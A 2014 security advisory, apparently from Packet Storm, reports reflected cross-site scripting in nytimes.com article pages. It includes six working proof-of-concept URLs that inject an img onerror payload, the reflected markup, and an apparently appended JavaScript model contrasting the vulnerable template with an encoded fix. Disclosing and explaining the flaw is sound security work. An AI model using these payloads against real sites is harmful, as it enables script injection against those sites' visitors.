
New York Times Cross Site Scripting

16 Oct 2014, reported by Jing Wang. Source: packetstormsecurity.com

New York Times XSS Vulnerability before 201

New York Times nytimes.com Page Design XSS Vulnerability (Almost all
Article Pages Before 2013 are Affected)
  
  
Domain:  
http://www.nytimes.com/  
  
  
  
Vulnerability Description:
The vulnerability occurs in the way New York Times (Nytimes) article pages
are built from the request URL. The page template copies the path of the
request into the href of the article's own navigation links (the "PRINT",
"SINGLE PAGE", "Page *" and "NEXT PAGE" buttons). Before 2013 that path was
not filtered or encoded at all, so anything appended after the article's
".html/" is reflected verbatim inside an href attribute: a double quote
closes the attribute, a ">" closes the tag, and whatever follows is parsed
as new markup.

Because this is part of the page design, almost all article pages published
before 2013 are affected; in practice, every article page that carries a
"PRINT", "SINGLE PAGE", "Page *" or "NEXT PAGE" button.

Nytimes changed this mechanism in 2013: the server now encodes the request
path before writing it back into the page, which makes the mechanism much
safer.

However, all article URLs from before 2013 still use the old mechanism, so
almost all article pages before 2013 remain vulnerable to XSS. I guess the
reason Nytimes did not fix the earlier URLs is cost: it would cost too much
(money and human capital) to change the database of all previously posted
articles.
  
  
  
  
Living POCs:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/"><img src=x onerror=prompt('justqdjing')>?pagewanted=all&_r=0
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2009/08/06/technology/06stats.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2008/07/09/dining/091crex.html/"><img src=x onerror=prompt('justqdjing')>
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/"><img src=x onerror=prompt('justqdjing')>
  
  
  
  
POC Video:  
https://www.youtube.com/user/tetraph  
  
  
  
  
Vulnerability Analysis:
Take the following link as an example:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack

The page reflects the injected string into every navigation link. The
relevant markup, as captured by the reporter, is shown below. Each link is
affected: the path is written into the href attribute without encoding, so
the injected quote ends the attribute, the ">" ends the <a> start tag, and
the rest of the path is parsed as a new element.

<li class="print">
<a
href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=print">Print</vulnerabletoattack?pagewanted=print"></a>
</li>

<li class="singlePage">
<a
href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=all">Single Page</vulnerabletoattack?pagewanted=all"></a>
</li>

<li> <a onclick="s_code_linktrack('Article-MultiPagePageNum2');"
title="Page 2"
href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=2">2</vulnerabletoattack?pagewanted=2"></a>
</li>

<li> <a onclick="s_code_linktrack('Article-MultiPagePageNum3');"
title="Page 3"
href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=3">3</vulnerabletoattack?pagewanted=3"></a>
</li>

<a class="next" onclick="s_code_linktrack('Article-MultiPage-Next');"
title="Next Page"
href="/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/"><vulnerabletoattack?pagewanted=2">Next
Page »</vulnerabletoattack?pagewanted=2"></a>
  
  
  
  
  
The vulnerability can be exploited without the victim being logged in. Tests
were performed with Firefox 26.0 on Ubuntu 12.04 and IE 9.0.15 on Windows 7.
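The mechanism described above, as an added example that is not code from nytimes.com or from the reporter: a minimal JavaScript model of a page template that writes the request path into the navigation links unencoded, beside a hardened version that attribute-encodes it first. The function names, the template shape and the percent-encoded sample URL are assumptions made for illustration; the first sample URL is the advisory's own POC.

```javascript
// Added example (not NYT's code and not the reporter's). Models the
// pre-2013 template described in the advisory: the request path is
// interpolated verbatim into the href of every pagination link, so a path
// ending in "><img ...> closes the attribute and the <a> tag and injects
// an element. Function names, template and sample URLs are assumptions.

// Encode the characters that can end an HTML attribute value or open a tag.
function escapeHtmlAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// What the application sees after routing: the path portion of the URL with
// percent-encoding undone. A browser may send " < > as %22 %3C %3E, but the
// server decodes them before use, so encoding on the wire is no defence.
function requestPath(url) {
  const withoutOrigin = url.replace(/^https?:\/\/[^/]+/, '');
  const path = withoutOrigin.split(/[?#]/, 1)[0];
  return decodeURIComponent(path);
}

// The navigation block the advisory quotes, built from a given href prefix.
function paginationLinks(hrefPrefix) {
  return [
    `<li class="print"><a href="${hrefPrefix}?pagewanted=print">Print</a></li>`,
    `<li class="singlePage"><a href="${hrefPrefix}?pagewanted=all">Single Page</a></li>`,
    `<a class="next" title="Next Page" href="${hrefPrefix}?pagewanted=2">Next Page &raquo;</a>`,
  ].join('\n');
}

// Pre-2013 behaviour: the decoded path goes straight into the markup.
function renderVulnerable(url) {
  return paginationLinks(requestPath(url));
}

// Hardened behaviour: encode for the attribute context before interpolating.
function renderFixed(url) {
  return paginationLinks(escapeHtmlAttr(requestPath(url)));
}

// Crude check: count <img start tags in the served markup. The navigation
// block contains none of its own, so any hit is attacker-controlled markup.
function countImgTags(html) {
  return (html.match(/<img\b/g) || []).length;
}

// Value of the first href attribute as an HTML parser would delimit it.
function firstHref(html) {
  const m = html.match(/href="([^"]*)"/);
  return m ? m[1] : null;
}

// Constructed inputs: the advisory's first POC URL, and the same kind of
// payload percent-encoded the way a browser would put it on the wire.
const POC_URL =
  "http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/\"><img src=x onerror=prompt('justqdjing')>";
const ENCODED_URL =
  'http://www.nytimes.com/2010/12/07/opinion/07brooks.html/%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E?pagewanted=all';

// Returns both renderings side by side for a quick look in a REPL.
function demo(url) {
  return { vulnerable: renderVulnerable(url), fixed: renderFixed(url) };
}
```

Under Node, `renderVulnerable(POC_URL)` yields three injected `<img>` elements (one per link) while `renderFixed(POC_URL)` keeps the whole payload inside the href value. The percent-encoded variant shows why encoding in the request does not help: the application decodes the path before reusing it, so the fix has to be output encoding in the attribute context (or rejecting any path component after the article's `.html` outright).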
  
  
  
  
  
Cross-site scripting (XSS) is a type of computer security vulnerability  
typically found in Web applications. XSS enables attackers to inject  
client-side script into Web pages viewed by other users. A cross-site  
scripting vulnerability may be used by attackers to bypass access controls  
such as the same origin policy.  
  
  
  
  
  
Reported By:  
Wang Jing, mathematics student from Nanyang Technological University,  
Singapore.  
http://tetraph.com/wangjing/  
  
  
  
  
More Details:  
http://www.tetraph.com/blog/xss-vulnerability/new-york-times-nytimes-com-page-design-xss-vulnerability-almost-all-article-pages-are-affected/  
  
  
